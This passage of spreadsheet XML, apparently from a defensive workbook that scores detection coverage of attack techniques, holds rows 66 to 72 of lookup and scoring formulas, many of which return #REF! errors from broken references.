      <c r="P66" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q66" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R66" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S66" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T66" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U66" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V66" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W66" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X66" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y66" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="67" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A67" s="8" t="s">
        <v>179</v>
      </c>
      <c r="B67" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C67" s="8" t="s">
        <v>550</v>
      </c>
      <c r="D67" s="10" t="s">
        <v>551</v>
      </c>
      <c r="E67" s="10" t="s">
        <v>552</v>
      </c>
      <c r="F67" s="10" t="s">
        <v>553</v>
      </c>
      <c r="G67" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K67,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H67" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I67" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J67" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K67" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L67" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M67" s="18" t="str">
        <f t="shared" ref="M67:M130" si="9">IF(L67&lt;0.2,"0-20",IF(L67&lt;0.4,"20-40",IF(L67&lt;0.6,"40-60",IF(L67&lt;0.8,"60-80","80-100"))))</f>
        <v>0-20</v>
      </c>
      <c r="N67" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O67" s="18" t="e">
        <f t="shared" ref="O67:O130" si="10">IF(N67&lt;0.2,"0-20",IF(N67&lt;0.4,"20-40",IF(N67&lt;0.6,"40-60",IF(N67&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="P67" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q67" s="18" t="e">
        <f t="shared" ref="Q67:Q130" si="11">IF(P67&lt;0.2,"0-20",IF(P67&lt;0.4,"20-40",IF(P67&lt;0.6,"40-60",IF(P67&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="R67" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S67" s="18" t="e">
        <f t="shared" ref="S67:S130" si="12">IF(R67&lt;0.2,"0-20",IF(R67&lt;0.4,"20-40",IF(R67&lt;0.6,"40-60",IF(R67&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="T67" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U67" s="18" t="e">
        <f t="shared" ref="U67:U130" si="13">IF(T67&lt;0.2,"0-20",IF(T67&lt;0.4,"20-40",IF(T67&lt;0.6,"40-60",IF(T67&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="V67" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W67" s="18" t="e">
        <f t="shared" ref="W67:W130" si="14">IF(V67&lt;0.2,"0-20",IF(V67&lt;0.4,"20-40",IF(V67&lt;0.6,"40-60",IF(V67&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="X67" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F67&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F67))-LEN(SUBSTITUTE(TRIM(F67),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y67" s="18" t="e">
        <f t="shared" ref="Y67:Y130" si="15">IF(X67&lt;0.2,"0-20",IF(X67&lt;0.4,"20-40",IF(X67&lt;0.6,"40-60",IF(X67&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="68" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A68" s="8" t="s">
        <v>59</v>
      </c>
      <c r="B68" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C68" s="8" t="s">
        <v>554</v>
      </c>
      <c r="D68" s="10" t="s">
        <v>555</v>
      </c>
      <c r="E68" s="10" t="s">
        <v>556</v>
      </c>
      <c r="F68" s="10" t="s">
        <v>557</v>
      </c>
      <c r="G68" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K68,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H68" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I68" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J68" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K68" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L68" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M68" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N68" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O68" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P68" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q68" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R68" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S68" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T68" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U68" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V68" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W68" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X68" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F68&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F68))-LEN(SUBSTITUTE(TRIM(F68),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y68" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="69" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A69" s="8" t="s">
        <v>34</v>
      </c>
      <c r="B69" s="8" t="s">
        <v>558</v>
      </c>
      <c r="C69" s="8" t="s">
        <v>559</v>
      </c>
      <c r="D69" s="10" t="s">
        <v>560</v>
      </c>
      <c r="E69" s="10" t="s">
        <v>561</v>
      </c>
      <c r="F69" s="10" t="s">
        <v>562</v>
      </c>
      <c r="G69" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K69,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H69" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I69" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J69" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K69" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L69" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M69" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N69" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O69" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P69" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q69" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R69" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S69" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T69" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U69" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V69" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W69" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X69" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F69&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F69))-LEN(SUBSTITUTE(TRIM(F69),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y69" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="70" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A70" s="8" t="s">
        <v>73</v>
      </c>
      <c r="B70" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C70" s="8" t="s">
        <v>563</v>
      </c>
      <c r="D70" s="10" t="s">
        <v>564</v>
      </c>
      <c r="E70" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F70" s="10" t="s">
        <v>565</v>
      </c>
      <c r="G70" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K70,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H70" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I70" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J70" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K70" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L70" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M70" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N70" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O70" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P70" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q70" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R70" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S70" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T70" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U70" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V70" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W70" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X70" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F70&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F70))-LEN(SUBSTITUTE(TRIM(F70),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y70" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="71" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A71" s="8" t="s">
        <v>182</v>
      </c>
      <c r="B71" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C71" s="8" t="s">
        <v>566</v>
      </c>
      <c r="D71" s="10" t="s">
        <v>567</v>
      </c>
      <c r="E71" s="10" t="s">
        <v>568</v>
      </c>
      <c r="F71" s="10" t="s">
        <v>569</v>
      </c>
      <c r="G71" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K71,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H71" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I71" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J71" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K71" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L71" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M71" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N71" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O71" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P71" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q71" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R71" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S71" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T71" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U71" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V71" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W71" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X71" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F71&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F71))-LEN(SUBSTITUTE(TRIM(F71),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y71" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="72" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A72" s="8" t="s">
        <v>126</v>
      </c>
      <c r="B72" s="8" t="s">
